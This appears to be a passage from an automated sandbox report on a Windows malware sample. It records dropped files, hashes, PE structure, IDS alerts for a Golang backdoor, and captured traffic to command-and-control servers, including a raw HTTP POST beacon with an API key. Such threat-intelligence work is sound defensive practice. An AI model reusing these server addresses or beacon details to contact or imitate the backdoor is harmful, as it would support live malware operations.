                                    FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsSet-up.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                                    • 46.8.232.106
                                    r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                    • 46.8.225.74
                                    newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                    • 46.8.225.74
                                    steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                    • 46.8.225.74
                                    AbC0LBkVhr.exeGet hashmaliciousSocks5SystemzBrowse
                                    • 46.8.225.74
                                    KRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                    • 46.8.225.74
                                    AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                    • 46.8.225.74
                                    6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                    • 46.8.225.74
                                    j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                    • 46.8.225.74
                                    TVHORADADAESnshsh4.elfGet hashmaliciousMiraiBrowse
                                    • 156.67.60.38
                                    https://agradeahead.com/Get hashmaliciousUnknownBrowse
                                    • 185.76.79.50
                                    http://productfocus.comGet hashmaliciousUnknownBrowse
                                    • 185.76.79.50
                                    mips.elfGet hashmaliciousMiraiBrowse
                                    • 156.67.60.34
                                    ppc.elfGet hashmaliciousMiraiBrowse
                                    • 156.67.60.61
                                    https://getvideoz.click/Get hashmaliciousUnknownBrowse
                                    • 185.215.4.66
                                    mips.elfGet hashmaliciousMiraiBrowse
                                    • 156.67.60.30
                                    arm5-20241201-0124.elfGet hashmaliciousMiraiBrowse
                                    • 156.67.60.62
                                    arm7-20241201-0124.elfGet hashmaliciousMiraiBrowse
                                    • 156.67.60.59
                                    arm.elfGet hashmaliciousMiraiBrowse
                                    • 156.67.60.45

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1264
                                    Entropy (8bit):5.378029932483578
                                    Encrypted:false
                                    SSDEEP:24:3FBWSKco4KmBs4RPT6BmFoUebIlmjKcmZ9tXt/NK3R8O9r/:vWSU4y4RQmFoUeUmfmZ9tlNWR8GT
                                    MD5:FDB2DD82A4439553B0BBFA0DD734A477
                                    SHA1:D8AAC3E2FAE870797DE627DE472E4E9DC8A70FEA
                                    SHA-256:A0A12EA527A987BF2E3E42261FE874F18738ED5341AAE05F287D383582A7F3DE
                                    SHA-512:C7B17B37EF60E14CA05954E7134B5CCD568E3EB7A3B8EEEE93F72F6C07D55B22A12D233877A210215A3C8AB7FCCB515CE07EA7E8DFE581C387F78FA3EFF365B5
                                    Malicious:false
                                    Reputation:low
                                    Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cn2nhad3.o55.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sibu0zjz.0cx.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vw31vlec.yod.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvggn4xv.nld.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\config

                                    Download File
                                    Process:C:\Users\user\Desktop\lDO4WBEQyL.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):492
                                    Entropy (8bit):6.276849981375167
                                    Encrypted:false
                                    SSDEEP:12:DMq63V2pfzi7YRJ9tGLFwx0MPYK2LE12qQfOHolsWGNn00u:DZm29zlBtGO0MPdKErolst0N
                                    MD5:2DA71D9BD3A98BB56AD568298509FE3F
                                    SHA1:A0056B51C3A3515704DB81B1636F27C6CCCE3B9B
                                    SHA-256:1322B6E0D2CE18074C60C570353671E941977DF16DFDC377E1A318776144C6BE
                                    SHA-512:5674498BE0A1E5A4895E195C46A3F3539D60341E4B9E5D8187E78164BC0507FA7AE78AF08D7BA534E6EFB1ED9736CA278ECFD064DD1AA24CA2862BD8AFA0D4C9
                                    Malicious:false
                                    Preview:..>...:".(%..+"TSS)&A..&L...]..=X...MV..Q++,@..6Q.6.ZQ+.\.YUM9XRX36W^6=WU)9 E^P.../..#)..S.%..<.Y=._F0..A.>WW^()_Q"=@.06[.W_G."&\.'6P..*_.Z.@.;4U_.5X...B6...'V0..9[.."5.;.4S.2WA.(-L.=.P..\_3!/M..0[.0._)/*Q]..G5S8_33.U.#._Q..@>3.Z.,.XQ.8B?.%.Z++..PZ.?^..5?PS.$.A?:.L])*Z.;(V18+M\<.X.;.V4+!S5_.GV.%\2..S.^.\%'.@...R6.R_*T"Z>.PO.8V..9....&..*7.)..T...L5 "F.PWW...R*;!G...\..TRZ./[.T<@..SR.'?_>..X'=7M8.VP..9B.-...Z3.).&.W....&.S3W8A.!RL[(.X...Z% PT,. G...ZR..VV9!G6:._5.$Z..'_5..@.9SR..P\%.>Y5.?

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.145237909053076
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:lDO4WBEQyL.exe
                                    File size:8'812'032 bytes
                                    MD5:43142552e4812e3337226ca1664ed728
                                    SHA1:8c1806c454beb91cc24fec69ca8e26c560790d6e
                                    SHA256:d08de75b76be3596cbcb6fa6f0c39bd41cd876d29cec1108990856989d6ed0f9
                                    SHA512:fbe6ac73a525a3eb090caa6dbc85cfcc31f0fbede4f9b0a541edfe22546ee90b67a2a8e276d1e3abebff869dbfcf4ebd0c57e5cfd8e8dc4bc1812a953e59e506
                                    SSDEEP:98304:SIxCKqVa0fpYI5ejgE1QEa1RR3Aw5nTlmoisSH4m3NHWtwLi1T2/GF25gFBfsxEm:pxjqVa0fpY7IEazN5nMoisSH4svYF
                                    TLSH:13966C1D8E3B09E58BE71DB8A5969FB87FBCB70C2A70435E47BA08015483F79061771A
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\.i.\.i.\.i..vj.Q.i..vl...i..vm.O.i...l.z.i...m.L.i...j.N.i..vh.Y.i.\.h...i...a.].i.....].i...k.].i.Rich\.i.........PE..L..

                                    File Icon

                                    Icon Hash:3030323030303428

                                    Static PE Info

                                    General

                                    Entrypoint:0x436540
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x676EB366 [Fri Dec 27 14:02:14 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:4159edb38142459c0d592c68fcfb12bb

                                    Entrypoint Preview

                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    call 00007F3378E27EFDh
                                    pop ebp
                                    ret
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    push 00000000h
                                    call dword ptr [00468018h]
                                    mov eax, dword ptr [ebp+08h]
                                    push eax
                                    call dword ptr [00468014h]
                                    push C0000409h
                                    call dword ptr [0046801Ch]
                                    push eax
                                    call dword ptr [00468020h]
                                    pop ebp
                                    ret
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000324h
                                    push 00000017h
                                    call dword ptr [00468024h]
                                    test eax, eax
                                    je 00007F3378E281F9h
                                    mov ecx, 00000002h
                                    int 29h
                                    mov dword ptr [00C50470h], eax
                                    mov dword ptr [00C5046Ch], ecx
                                    mov dword ptr [00C50468h], edx
                                    mov dword ptr [00C50464h], ebx
                                    mov dword ptr [00C50460h], esi
                                    mov dword ptr [00C5045Ch], edi
                                    mov word ptr [00C50488h], ss
                                    mov word ptr [00C5047Ch], cs
                                    mov word ptr [00C50458h], ds
                                    mov word ptr [00C50454h], es
                                    mov word ptr [00C50450h], fs
                                    mov word ptr [00C5044Ch], gs
                                    pushfd
                                    pop dword ptr [00C50480h]
                                    mov eax, dword ptr [ebp+00h]
                                    mov dword ptr [00C50474h], eax
                                    mov eax, dword ptr [ebp+04h]
                                    mov dword ptr [00C50478h], eax
                                    lea eax, dword ptr [ebp+08h]
                                    mov dword ptr [00C50484h], eax

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x76b540x3c.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x8530000x130d9.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x8670000x5de8.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x75b1c0x54.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x75b700x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x680000x138.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x6662a0x66800801052a5a72c2c554a19146608d98944False0.4894435975609756data6.378532137689188IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x680000xf24c0xf40081f0dca41b069d779bfb91c610fd9ed9False0.3240266393442623data4.5864135163773065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x780000x7d94b80x7d8400d9ec9b9f5bd045ed0371fec913cc8e08unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .fptable0x8520000x800x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x8530000x130d90x1320098c3859ea3f901469b91c116e046a172False0.07089971405228758data4.40099057587106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x8670000x5de80x5e00031856b7d0a5dc059a1fc3ee1fecb555False0.801030585106383data6.815190496020655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x8534f00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.011741393588075239
                                    RT_MENU0x863d180x22data1.1176470588235294
                                    RT_MENU0x863d3c0x26data1.105263157894737
                                    RT_DIALOG0x863d640x24cdata0.5952380952380952
                                    RT_DIALOG0x863fb00x31cdata0.5414572864321608
                                    RT_DIALOG0x8642cc0x2d4data0.5386740331491713
                                    RT_DIALOG0x8645a00x234data0.5886524822695035
                                    RT_DIALOG0x8647d40x24cdata0.5867346938775511
                                    RT_DIALOG0x864a200x194data0.6188118811881188
                                    RT_DIALOG0x864bb40x328data0.5160891089108911
                                    RT_DIALOG0x864edc0x110data0.6801470588235294
                                    RT_STRING0x864fec0xb0data0.7045454545454546
                                    RT_STRING0x86509c0x188data0.6275510204081632
                                    RT_STRING0x8652240x17cdata0.6210526315789474
                                    RT_STRING0x8653a00x1a8data0.6084905660377359
                                    RT_STRING0x8655480x19cdata0.6043689320388349
                                    RT_STRING0x8656e40xc8data0.675
                                    RT_MESSAGETABLE0x8657ac0x2f4Matlab v4 mat-file (little endian) Y, rows 73, columns 73, imaginary0.5211640211640212
                                    RT_MESSAGETABLE0x865aa00x3ccMatlab v4 mat-file (little endian) Y\001, rows 326, columns 329, imaginary0.5257201646090535
                                    RT_GROUP_ICON0x865e6c0x14data1.15
                                    RT_VERSION0x865e800xdcdata0.6681818181818182
                                    RT_MANIFEST0x865f5c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                    Imports

                                    DLLImport
                                    KERNEL32.dllVirtualProtect, WriteFile, CreateFileW, DecodePointer, GetConsoleMode, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetStdHandle, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, InitializeCriticalSectionEx, LCMapStringW, GetProcessHeap, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, CloseHandle
                                    USER32.dllMessageBoxA, MessageBoxW

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2025-01-01T17:02:44.862102+01002855539ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M21185.157.213.25322132192.168.2.559227TCP
                                    2025-01-01T17:02:44.876620+01002855536ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M11192.168.2.559227185.157.213.25322132TCP
                                    2025-01-01T17:03:14.288230+01002855537ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M21192.168.2.559227185.157.213.25322132TCP
                                    2025-01-01T17:03:14.460470+01002855538ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M11185.157.213.25322132192.168.2.559227TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 1, 2025 17:01:44.141230106 CET5903653192.168.2.5162.159.36.2
                                    Jan 1, 2025 17:01:44.146087885 CET5359036162.159.36.2192.168.2.5
                                    Jan 1, 2025 17:01:44.146225929 CET5903653192.168.2.5162.159.36.2
                                    Jan 1, 2025 17:01:44.151417971 CET5359036162.159.36.2192.168.2.5
                                    Jan 1, 2025 17:01:44.591259003 CET5903653192.168.2.5162.159.36.2
                                    Jan 1, 2025 17:01:44.596268892 CET5359036162.159.36.2192.168.2.5
                                    Jan 1, 2025 17:01:44.596333981 CET5903653192.168.2.5162.159.36.2
                                    Jan 1, 2025 17:02:43.384221077 CET5922680192.168.2.546.8.232.106
                                    Jan 1, 2025 17:02:43.389094114 CET805922646.8.232.106192.168.2.5
                                    Jan 1, 2025 17:02:43.389184952 CET5922680192.168.2.546.8.232.106
                                    Jan 1, 2025 17:02:43.389489889 CET5922680192.168.2.546.8.232.106
                                    Jan 1, 2025 17:02:43.394284010 CET805922646.8.232.106192.168.2.5
                                    Jan 1, 2025 17:02:44.278578997 CET805922646.8.232.106192.168.2.5
                                    Jan 1, 2025 17:02:44.282610893 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:02:44.287389994 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:02:44.287462950 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:02:44.320118904 CET5922680192.168.2.546.8.232.106
                                    Jan 1, 2025 17:02:44.862102032 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:02:44.876620054 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:02:44.881436110 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:03:00.052450895 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:03:00.057351112 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:03:04.806451082 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:03:04.864960909 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:03:04.983659029 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:03:04.988507032 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:03:14.288229942 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:03:14.293134928 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:03:14.366863012 CET5922680192.168.2.546.8.232.106
                                    Jan 1, 2025 17:03:14.371727943 CET805922646.8.232.106192.168.2.5
                                    Jan 1, 2025 17:03:14.460469961 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:03:14.555089951 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:03:25.156049967 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:03:25.181206942 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:03:25.186094046 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:03:40.353435993 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:03:40.358309031 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:03:44.462758064 CET5922680192.168.2.546.8.232.106
                                    Jan 1, 2025 17:03:44.525584936 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:03:44.650660992 CET805922646.8.232.106192.168.2.5
                                    Jan 1, 2025 17:03:44.650672913 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:03:44.817909002 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:03:44.964365959 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:03:45.353786945 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:03:45.371764898 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:03:45.376518965 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:04:00.463525057 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:04:00.468405008 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:04:05.577845097 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:04:05.623042107 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:04:05.627876997 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:04:14.318263054 CET5922680192.168.2.546.8.232.106
                                    Jan 1, 2025 17:04:14.323333025 CET805922646.8.232.106192.168.2.5
                                    Jan 1, 2025 17:04:14.323400021 CET5922680192.168.2.546.8.232.106
                                    Jan 1, 2025 17:04:14.834716082 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:04:14.839677095 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:04:15.007049084 CET2213259227185.157.213.253192.168.2.5
                                    Jan 1, 2025 17:04:15.055140018 CET5922722132192.168.2.5185.157.213.253
                                    Jan 1, 2025 17:04:18.079575062 CET5922880192.168.2.546.8.232.106
                                    Jan 1, 2025 17:04:18.084449053 CET805922846.8.232.106192.168.2.5
                                    Jan 1, 2025 17:04:18.085901022 CET5922880192.168.2.546.8.232.106
                                    Jan 1, 2025 17:04:18.093914032 CET5922880192.168.2.546.8.232.106
                                    Jan 1, 2025 17:04:18.098762035 CET805922846.8.232.106192.168.2.5
                                    Jan 1, 2025 17:04:18.129911900 CET5922980192.168.2.546.8.232.106
                                    Jan 1, 2025 17:04:18.134711981 CET805922946.8.232.106192.168.2.5
                                    Jan 1, 2025 17:04:18.134860039 CET5922980192.168.2.546.8.232.106
                                    Jan 1, 2025 17:04:18.135109901 CET5922980192.168.2.546.8.232.106
                                    Jan 1, 2025 17:04:18.139862061 CET805922946.8.232.106192.168.2.5
                                    Jan 1, 2025 17:04:19.008264065 CET805922946.8.232.106192.168.2.5
                                    Jan 1, 2025 17:04:19.166759014 CET5922980192.168.2.546.8.232.106
                                    Jan 1, 2025 17:04:19.281573057 CET805922846.8.232.106192.168.2.5
                                    Jan 1, 2025 17:04:19.479193926 CET5922880192.168.2.546.8.232.106

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 1, 2025 17:01:44.140511036 CET5363175162.159.36.2192.168.2.5
                                    Jan 1, 2025 17:01:44.595432043 CET5473753192.168.2.51.1.1.1
                                    Jan 1, 2025 17:01:44.602360964 CET53547371.1.1.1192.168.2.5

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 1, 2025 17:01:44.595432043 CET192.168.2.51.1.1.10x6411Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 1, 2025 17:01:44.602360964 CET1.1.1.1192.168.2.50x6411Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • 46.8.232.106

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.55922646.8.232.106807328C:\Users\user\Desktop\lDO4WBEQyL.exe
                                    TimestampBytes transferredDirectionData
                                    Jan 1, 2025 17:02:43.389489889 CET314OUTPOST / HTTP/1.1
                                    Host: 46.8.232.106
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 178
                                    X-Api-Key: z9AJoadU
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 34 05 0d 16 07 23 11 16 02 2f 30 08 0e 22 29 2a 0a 0a 01 10 06 14 54 58 09 54 36 00 07 38 56 52 0b 59 50 24 0e 04 20 1c 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2c 2f 01 09 1b 3e 07 2d 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 0a 1f 16 5e 26 07 23 25 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 26 36 39 41 2d 5e 3a 54 29 04 09 44 45 45 0e 0b 5b 44 53 45 57 5c 5f 52 5b 52 56 5d 0b 52 51 56 51 0a 5d 55 5a 50 51 5d 58 05 08 56 55 59 5a 03 0d 50 51 57 4c 1b
                                    Data Ascii: M*L\K4#/0")*TXT68VRYP$ DEE2MTD,/>-ACL>K]A^&#%DEE1AULV&69A-^:T)DEE[DSEW\_R[RV]RQVQ]UZPQ]XVUYZPQWL
                                    Jan 1, 2025 17:02:44.278578997 CET632INHTTP/1.1 200 OK
                                    Date: Wed, 01 Jan 2025 16:02:44 GMT
                                    Content-Length: 514
                                    Content-Type: text/plain; charset=utf-8
